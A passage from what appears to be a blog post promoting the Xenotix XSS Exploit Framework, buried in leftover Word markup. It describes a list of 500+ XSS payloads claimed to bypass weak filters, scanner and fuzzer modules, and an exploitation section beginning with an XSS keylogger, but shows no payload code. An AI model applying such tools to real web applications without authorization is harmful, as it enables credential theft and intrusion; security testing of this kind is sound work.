UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles></xml><![endif]--><!--[if gte mso 10]><style> /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin-top:0in; mso-para-margin-right:0in; mso-para-margin-bottom:8.0pt; mso-para-margin-left:0in; line-height:107%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi;} </style><![endif]--> </span></b><br /><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">[VIDEO] </span></b><a href="https://www.youtube.com/watch?v=CJEgO4_kd-8"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">https://www.youtube.com/watch?v=CJEgO4_kd-8</span></b></a><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"> [/VIDEO]</span></b></span></b></div><br /><h4><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">Built in Payload List</span></b></h4></div><div class="MsoNormal"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">It is having an inbuilt XSS payload list of above 500+ XSS payloads. It includes HTML5 compactable XSS injection payloads.Most of the XSS filters are implemented using <i style="mso-bidi-font-style: normal;">String Replace filter</i>, <i style="mso-bidi-font-style: normal;">htmlentities filter</i> and <i style="mso-bidi-font-style: normal;">htmlspecialcharacters filter</i>. Most of these weakly designed filters can be bypassed by specific XSS payloads present in the inbuilt payload list.</span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://oi46.tinypic.com/2iuxmh4.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://oi46.tinypic.com/2iuxmh4.jpg" width="400" /></a></div><div class="MsoNormal"><br /></div><br /><div class="MsoNormal"></div><div class="MsoNormal"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">The above chart shows the number of XSS Payloads in different XSS Scanning tools available in market. Xenotix XSS Exploit Framework got the world’s second largest XSS Payload list after IBM AppScan Security which is having 700 million payloads.</span></div><div class="MsoNormal"><h4><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">XSS Scanner Module</span></b></h4></div><!--[if gte mso 9]><xml> <o:OfficeDocumentSettings> <o:RelyOnVML/> <o:AllowPNG/> </o:OfficeDocumentSettings></xml><![endif]--><br /><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves/> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF/> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> <w:DontGrowAutofit/> <w:SplitPgBreakAndParaMark/> <w:DontVertAlignCellWithSp/> <w:DontBreakConstrainedForcedTables/> <w:DontVertAlignInTxbx/> <w:Word11KerningPairs/> <w:CachedColBalance/> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math"/> <m:brkBin m:val="before"/> <m:brkBinSub m:val="--"/> <m:smallFrac m:val="off"/> <m:dispDef/> <m:lMargin m:val="0"/> <m:rMargin m:val="0"/> <m:defJc m:val="centerGroup"/> <m:wrapIndent m:val="1440"/> <m:intLim m:val="subSup"/> <m:naryLim m:val="undOvr"/> </m:mathPr></w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true" DefSemiHidden="true" DefQFormat="false" DefPriority="99" LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Normal"/> <w:LsdException Locked="false" Priority="9" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="heading 1"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/> <w:LsdException Locked="false" Priority="39" Name="toc 1"/> <w:LsdException Locked="false" Priority="39" Name="toc 2"/> <w:LsdException Locked="false" Priority="39" Name="toc 3"/> <w:LsdException Locked="false" Priority="39" Name="toc 4"/> <w:LsdException Locked="false" Priority="39" Name="toc 5"/> <w:LsdException Locked="false" Priority="39" Name="toc 6"/> <w:LsdException Locked="false" Priority="39" Name="toc 7"/> <w:LsdException Locked="false" Priority="39" Name="toc 8"/> <w:LsdException Locked="false" Priority="39" Name="toc 9"/> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/> <w:LsdException Locked="false" Priority="10" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Title"/> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/> <w:LsdException Locked="false" Priority="11" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/> <w:LsdException Locked="false" Priority="22" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Strong"/> <w:LsdException Locked="false" Priority="20" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/> <w:LsdException Locked="false" Priority="59" SemiHidden="false" UnhideWhenUsed="false" Name="Table Grid"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/> <w:LsdException Locked="false" Priority="1" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 1"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles></xml><![endif]--><!--[if gte mso 10]><style> /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin-top:0in; mso-para-margin-right:0in; mso-para-margin-bottom:8.0pt; mso-para-margin-left:0in; line-height:107%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi;} </style><![endif]--> <br /><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">[VIDEO] </span></b><a href="https://www.youtube.com/watch?v=CJEgO4_kd-8"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">https://www.youtube.com/watch?v=CJEgO4_kd-8</span></b></a><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">[/VIDEO]</span></b></div><br /><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"> </span></b></b></div><div class="MsoNormal"></div><div class="MsoNormal"><h4><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">XSS Multi-Parameter Scanner</span></b></h4></div><br /><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"> </span></b></b></div><div class="separator" style="clear: both; text-align: center;"><b style="mso-bidi-font-weight: normal;"><a href="http://i47.tinypic.com/15wjkau.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="http://i47.tinypic.com/15wjkau.png" width="400" /></a></b></div><b style="mso-bidi-font-weight: normal;">  </b><br /><br /><div class="MsoNormal"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">The Multi-Parameter XSS Scanner comes when you have multiple parameter to test for XSS. It can extract the different parameters from the given URL and test them individually. It saves a lot of your time as you don’t need to test each parameters separately.</span></div><div class="MsoNormal"><br /></div><div class="MsoNormal"><h4><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">XSS Fuzzer</span></b></span> </span></h4></div><div class="MsoNormal"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://oi47.tinypic.com/no8pdf.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="107" src="http://oi47.tinypic.com/no8pdf.jpg" width="400" /></a></div><div class="MsoNormal"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"> </span></div><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"><br /></span></b></div>  <i style="mso-bidi-font-style: normal;"><span style="font-size: 9.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"><br /></span></i><br /><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">  </span><br /><div class="MsoNormal"><span style="font-family: "Calibri","sans-serif"; font-size: 12.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 11.0pt; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">The XSS Fuzzer is a convenient module to detect hidden XSS as well as other vulnerabilities like HTTP Parameter Polution. With the Fuzzer, one can conduct an out of the box testing of the box fuzzing to detect hidden vulnerabilities in a web application. </span></div><br /><br /><h4 class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 18.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">2. Exploitation Framework</span></b></h4><h4 class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">XSS Keylogger</span></b></h4><div class="separator" style="clear: 